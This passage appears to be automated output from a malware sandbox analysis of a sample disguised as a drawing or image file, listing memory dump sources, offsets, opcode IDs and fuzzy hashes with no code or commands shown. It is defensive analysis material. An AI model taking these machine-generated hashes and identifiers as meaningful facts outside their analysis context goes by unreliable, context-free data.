                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b9f3ff4682e64d3263b90bf85eaf3533cd18c8cc5043cf1236c437150593a70
                                                                                      • Instruction ID: d118591233dc3fbde288b571ceb2e4ddee137d841891d33b79ddb56fa9cf2402
                                                                                      • Opcode Fuzzy Hash: 7b9f3ff4682e64d3263b90bf85eaf3533cd18c8cc5043cf1236c437150593a70
                                                                                      • Instruction Fuzzy Hash: DAD0A7324353094BEB84E771F646589372677C2310340C821E0081A115BE644597DE58
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3911d6e79fffd4800a5a056b34a65c75e64b88b87eef7ec1d29c109dbc4433d1
                                                                                      • Instruction ID: d2cdd06cee943ef1631855ce39c71fe37a21a39a0bcea864820b75d0cce63425
                                                                                      • Opcode Fuzzy Hash: 3911d6e79fffd4800a5a056b34a65c75e64b88b87eef7ec1d29c109dbc4433d1
                                                                                      • Instruction Fuzzy Hash: 20D0927A7421208FC715DB69E454899BB75FF9A22632455BEE2018B622C6328846CB14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e7ab520afe737ecd3d4b679680da721c69aafe13b8d18dc4fa02a9920de7e7a
                                                                                      • Instruction ID: fa4bcde4ed45c8651bf40b0736feadf5e6389d0d2dc93f9c37649e8aa2403baf
                                                                                      • Opcode Fuzzy Hash: 2e7ab520afe737ecd3d4b679680da721c69aafe13b8d18dc4fa02a9920de7e7a
                                                                                      • Instruction Fuzzy Hash: 78C0123583570D4FE644E771E946959772A7AC03147808825E00916125BF745597CE9C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f2ff210a98096977a984a9bc4e87209df0c6dd499a87b1831b68554382b5b172
                                                                                      • Instruction ID: 7d7ad5c4d2b15e3cb80701186270411fa5081e99a62356c2eb4b013975350980
                                                                                      • Opcode Fuzzy Hash: f2ff210a98096977a984a9bc4e87209df0c6dd499a87b1831b68554382b5b172
                                                                                      • Instruction Fuzzy Hash: EEC08C3500A3828FDF13CBA428860893FA0DE0724030620C2C485CB02BC008168BDB23
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,
                                                                                      • API String ID: 0-3772416878
                                                                                      • Opcode ID: 62bf52b9a1f97b882d6b1c2d76e263d7e70a0fd7388adf488c658032db093738
                                                                                      • Instruction ID: 2ed13f212ac728b68fc27af18df6bf526b5c52dd2273ea8d14fc4ed0f4d2ed86
                                                                                      • Opcode Fuzzy Hash: 62bf52b9a1f97b882d6b1c2d76e263d7e70a0fd7388adf488c658032db093738
                                                                                      • Instruction Fuzzy Hash: 76410774D01248CBEB14DFAAD8546EEBBF2BF89300F24D42AC418BB254EB346902CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eeb48623b72f4451527b23140df4f82265a99dbdb117b53a55959d2e12ef41dc
                                                                                      • Instruction ID: 763c94f0cc6687e80608a04b36a7ab7b3c7b4353cdbd785a22f911537ea23304
                                                                                      • Opcode Fuzzy Hash: eeb48623b72f4451527b23140df4f82265a99dbdb117b53a55959d2e12ef41dc
                                                                                      • Instruction Fuzzy Hash: 26826D74E052288FEB64DF69C994BDDBBB2BB89300F1081E9E40DA7265DB315E81DF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5cafd784758ac7bff152609a30958159698f5817fe601c6bdd4930df4a98f551
                                                                                      • Instruction ID: b6d3a1cb063ddc181a8d7b50219bccb12b0c83e5293293d69e0798abb02bd43f
                                                                                      • Opcode Fuzzy Hash: 5cafd784758ac7bff152609a30958159698f5817fe601c6bdd4930df4a98f551
                                                                                      • Instruction Fuzzy Hash: F8D19174E003188FEB54DFA9C994B9DBBB2BF89300F2081A9D409BB354DB355A82DF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb40d6beda6a6dd9edd2feb6fe49fbf141d5c587b8a081d73ec95ea1b8d4b5c3
                                                                                      • Instruction ID: be83097ddc8bd49dbd9ec24e80785f074b09e42f700d9db2518488ccb540fce4
                                                                                      • Opcode Fuzzy Hash: fb40d6beda6a6dd9edd2feb6fe49fbf141d5c587b8a081d73ec95ea1b8d4b5c3
                                                                                      • Instruction Fuzzy Hash: C4C1AE74E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d7113ee5163f5df643e15edab9ce31c58c04b254e419c362d100203f609b6ffc
                                                                                      • Instruction ID: e1c50b41404e19c62ef638c0f27cabd4621ac060bbde7bbe9dcc76a76a930e64
                                                                                      • Opcode Fuzzy Hash: d7113ee5163f5df643e15edab9ce31c58c04b254e419c362d100203f609b6ffc
                                                                                      • Instruction Fuzzy Hash: 5DC1AF74E00318CFEB54DFA5C980B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a518f7ebe54e96ecc2ad6162f768f4e0d852fa63d207ba6f191269caedfe420e
                                                                                      • Instruction ID: 27f3ed30e3b4ed608ee40075b12737a53e4d94579ede7bc8bba1f305bfbdc989
                                                                                      • Opcode Fuzzy Hash: a518f7ebe54e96ecc2ad6162f768f4e0d852fa63d207ba6f191269caedfe420e
                                                                                      • Instruction Fuzzy Hash: DDC1AE74E00318CFEB54DFA5C980B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c0671890467b8388cfcc081a2bf43bf8288bd13d7c6aded5dc7618d7bf563156
                                                                                      • Instruction ID: daa5acc65de3ca165520e6bc51f2629919ecd627721616b6ba38e8586d3e57a8
                                                                                      • Opcode Fuzzy Hash: c0671890467b8388cfcc081a2bf43bf8288bd13d7c6aded5dc7618d7bf563156
                                                                                      • Instruction Fuzzy Hash: 8FC1AF74E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB349A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8e501a6835e0d4d73b1ba357eb389b0b8c003b187bf3ddbbacec199e691cb49e
                                                                                      • Instruction ID: f67a08eb84abff28f9e350dfcd2a16223ff2439d50df1473becef38e4253747d
                                                                                      • Opcode Fuzzy Hash: 8e501a6835e0d4d73b1ba357eb389b0b8c003b187bf3ddbbacec199e691cb49e
                                                                                      • Instruction Fuzzy Hash: 71A1C271E047189BEB18DFBAD9502DEBBF2AF89310F248569D815AB390DB358D01CB91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 962b3e05d532b375adf3fba969c17a8e98cf7b17015edc27265873b70c7434c6
                                                                                      • Instruction ID: 7e02b3622f3a7dc9255f40934c987975847e9d2108f0bc282f3f78426697ad29
                                                                                      • Opcode Fuzzy Hash: 962b3e05d532b375adf3fba969c17a8e98cf7b17015edc27265873b70c7434c6
                                                                                      • Instruction Fuzzy Hash: DDC19F74E01318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77baa7d6b903f1fe36bba9ac53fa550bda285f62c20c8bff57405eb71a9a7a19
                                                                                      • Instruction ID: acd733e926c7c8c0bac902a49373a6d562fce2dda7f619ac6c7a906cc2975f01
                                                                                      • Opcode Fuzzy Hash: 77baa7d6b903f1fe36bba9ac53fa550bda285f62c20c8bff57405eb71a9a7a19
                                                                                      • Instruction Fuzzy Hash: DEC19E74E003188FEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 326a503cb535e69dbbae699042626419028dbc59a8a733132edf1c8cfe83e044
                                                                                      • Instruction ID: d8520a316381e9c7e0a54ee976b313bf06c8bb785df6a661ae74f6ab25531986
                                                                                      • Opcode Fuzzy Hash: 326a503cb535e69dbbae699042626419028dbc59a8a733132edf1c8cfe83e044
                                                                                      • Instruction Fuzzy Hash: 5CC1AF74E00318CFEB54DFA5C984B9DBBF2BF8A304F2081A9D809AB255DB355A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48bf1a4cd9ffc4796d5f43eb0f1d41b1ddeaf063659335aa2e0f5fac125cea37
                                                                                      • Instruction ID: 31ca05bd569e549febf30eca2d58ef4a868581b4eb59f61755c3d553b54407a3
                                                                                      • Opcode Fuzzy Hash: 48bf1a4cd9ffc4796d5f43eb0f1d41b1ddeaf063659335aa2e0f5fac125cea37
                                                                                      • Instruction Fuzzy Hash: 16C19F74E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB355A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1cbebe76498c1eeed40176ef373089ba9267ab8c7060bf102b187ecd96c84b8c
                                                                                      • Instruction ID: 91146fec3f483a0afaf8839725acb4d044ce8d32c19b87ed95ae406c8be0250c
                                                                                      • Opcode Fuzzy Hash: 1cbebe76498c1eeed40176ef373089ba9267ab8c7060bf102b187ecd96c84b8c
                                                                                      • Instruction Fuzzy Hash: 5FC19F74E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cea7f6041c9c5c4fe9a94dd04774fb3fdb888267ba9a1338df808aeeb9b525e7
                                                                                      • Instruction ID: 2b014c1b49f9c013cb9f8fe3a3f5eb56481bedbd0cc62b033aead0bb7be186a8
                                                                                      • Opcode Fuzzy Hash: cea7f6041c9c5c4fe9a94dd04774fb3fdb888267ba9a1338df808aeeb9b525e7
                                                                                      • Instruction Fuzzy Hash: 8CC1AE74E00318CFEB54DFA5C990B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f23667216ae840bca748e22742225c02b1715d4bbf4a63ca858d3007f937c500
                                                                                      • Instruction ID: 0082c60d55669badf42bd1b17c46fd3ea9ff32d15b7fb7869f223ded242fce36
                                                                                      • Opcode Fuzzy Hash: f23667216ae840bca748e22742225c02b1715d4bbf4a63ca858d3007f937c500
                                                                                      • Instruction Fuzzy Hash: DAC1A074E00318CFEB54DFA5C980B9DBBF2BF89304F2081A9D809AB255DB355A81CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a62adaf58264a4ae31e180f51b7383082400672d5ed13204ca524a1a1df6b1a7
                                                                                      • Instruction ID: 38562b9f3da1c477f9e3b90a7c2ad8dc0da1241f50cc0dbd31e4865f96bd3e6c
                                                                                      • Opcode Fuzzy Hash: a62adaf58264a4ae31e180f51b7383082400672d5ed13204ca524a1a1df6b1a7
                                                                                      • Instruction Fuzzy Hash: C7C1A074E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f3d51d5baa1aa27e216f4037295668f1fc4e2dcb5bd0ab6291b96708956b1fee
                                                                                      • Instruction ID: bd7bae7f74f812e799da2c68cc5f540e7e26972af6020919e91486dd79577a3b
                                                                                      • Opcode Fuzzy Hash: f3d51d5baa1aa27e216f4037295668f1fc4e2dcb5bd0ab6291b96708956b1fee
                                                                                      • Instruction Fuzzy Hash: 37C1BF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 624844a854f15459f76ab7f9bcaa1d7a27347c53a5e21b63212340b445af125b
                                                                                      • Instruction ID: 1ad076dbe6defcd2338a60b8a4430fcae121587005eac2a1dbd8a0ec44b1a77a
                                                                                      • Opcode Fuzzy Hash: 624844a854f15459f76ab7f9bcaa1d7a27347c53a5e21b63212340b445af125b
                                                                                      • Instruction Fuzzy Hash: A1C1BF74E00318CFEB54DFA5C984B9DBBB2BF89304F6081A9D809AB355DB359A81CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d2b66a19c2740ea819243e2c5a52b2e12dc9b7626b606e1d7812dba165475c5a
                                                                                      • Instruction ID: ccdcf31e826aec9a43273c5a20be372ec6cd1593979259033761c55b6ad06ea7
                                                                                      • Opcode Fuzzy Hash: d2b66a19c2740ea819243e2c5a52b2e12dc9b7626b606e1d7812dba165475c5a
                                                                                      • Instruction Fuzzy Hash: BBC1A074E04318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB255DB359A81CF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7783d553cdcb9ff71c4676220abc48014006cb7bdc34c6bb1d7db17fea0d6ded
                                                                                      • Instruction ID: a633dcbfb632189fe29203dbe19fb33ea6107081946eb12802d5358cb2d4a576
                                                                                      • Opcode Fuzzy Hash: 7783d553cdcb9ff71c4676220abc48014006cb7bdc34c6bb1d7db17fea0d6ded
                                                                                      • Instruction Fuzzy Hash: 51C1BE74E01318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB354DB349A81DF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fade9c1c0f1cf8fc689e4fe3255cfcbe7126c1c464d8a584562235fd814c21f7
                                                                                      • Instruction ID: bd22e5631b4581a205c61fa2a0c909b85dfbd2f3ff3029567f7661092da4e30c
                                                                                      • Opcode Fuzzy Hash: fade9c1c0f1cf8fc689e4fe3255cfcbe7126c1c464d8a584562235fd814c21f7
                                                                                      • Instruction Fuzzy Hash: 45C1BF74E01318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 62a7425ba0584d145b8467f0eb5e22b998df7f7a543aa512f164aae522818860
                                                                                      • Instruction ID: 97e4181b940991ee464a3b254dced5c0ddec94b17df65b40160071b8b80446d9
                                                                                      • Opcode Fuzzy Hash: 62a7425ba0584d145b8467f0eb5e22b998df7f7a543aa512f164aae522818860
                                                                                      • Instruction Fuzzy Hash: A4C1B074E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16ebfedb6dedab9f1c0aa212458d52a49f211519c8ef1b75c66d8ba37b2ac1cd
                                                                                      • Instruction ID: 6f86110c23f48c5f02d90d5f9533ee42a8a23bd710648e47c14f8aeb13d4a3c4
                                                                                      • Opcode Fuzzy Hash: 16ebfedb6dedab9f1c0aa212458d52a49f211519c8ef1b75c66d8ba37b2ac1cd
                                                                                      • Instruction Fuzzy Hash: 58C1AF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35b2917e90dccbdaec2c5db2b8bbd1ac7e5ce9633d38d0868598d7aa747fa8ee
                                                                                      • Instruction ID: 8306b18343f85da6e4f2b30685623b832003bf34c5e93444c88cf60a9956056c
                                                                                      • Opcode Fuzzy Hash: 35b2917e90dccbdaec2c5db2b8bbd1ac7e5ce9633d38d0868598d7aa747fa8ee
                                                                                      • Instruction Fuzzy Hash: 10C1AF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1310d3d68bcfbcd9534306bf713fbbea8fbc753f8d5205f5e574ff1e821e5e07
                                                                                      • Instruction ID: 5f09b764c2b5d81b4d9d104f074ba1ec7f3f2d3dc7539b8acefaf0784d8585b5
                                                                                      • Opcode Fuzzy Hash: 1310d3d68bcfbcd9534306bf713fbbea8fbc753f8d5205f5e574ff1e821e5e07
                                                                                      • Instruction Fuzzy Hash: 01C1A174E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4cb892843494f4b8ed14aad953afd2df433ba9327f8cb0d37f9692abdb61ed12
                                                                                      • Instruction ID: edfcbac183ab7e525f543c6d3f88d00d1eb4448a6e23d64d505ffc7b3350aebf
                                                                                      • Opcode Fuzzy Hash: 4cb892843494f4b8ed14aad953afd2df433ba9327f8cb0d37f9692abdb61ed12
                                                                                      • Instruction Fuzzy Hash: 50C1B174E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f0b31a81229c54620424de26d5ef96daae78be28854daa89628284ef5451e6b
                                                                                      • Instruction ID: 8bef15879ab5825949ababe67171f0087e2e6a7aab48cf788714bbaa0972406b
                                                                                      • Opcode Fuzzy Hash: 8f0b31a81229c54620424de26d5ef96daae78be28854daa89628284ef5451e6b
                                                                                      • Instruction Fuzzy Hash: 21C1B074E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB349A81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9053bc30d1546cae464fc51a11ed012409c8b36758f6c99cf77db5f7ea285e12
                                                                                      • Instruction ID: 906a304e51ac68ec3768a61b5bee443a6c85f71ba66837527f158b2554f30046
                                                                                      • Opcode Fuzzy Hash: 9053bc30d1546cae464fc51a11ed012409c8b36758f6c99cf77db5f7ea285e12
                                                                                      • Instruction Fuzzy Hash: 10C1CF74E00318CFEB54DFA5C984B9DBBB2BF89304F6081A9D809AB355DB359A81CF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 98810c7e492aa9380e28c562036934bbc9c11ce1e87e106bdf5607afb438adef
                                                                                      • Instruction ID: ab4be700044598eeb5f626ff66c4f61ec82b0106b19448435a54aacb85759ca2
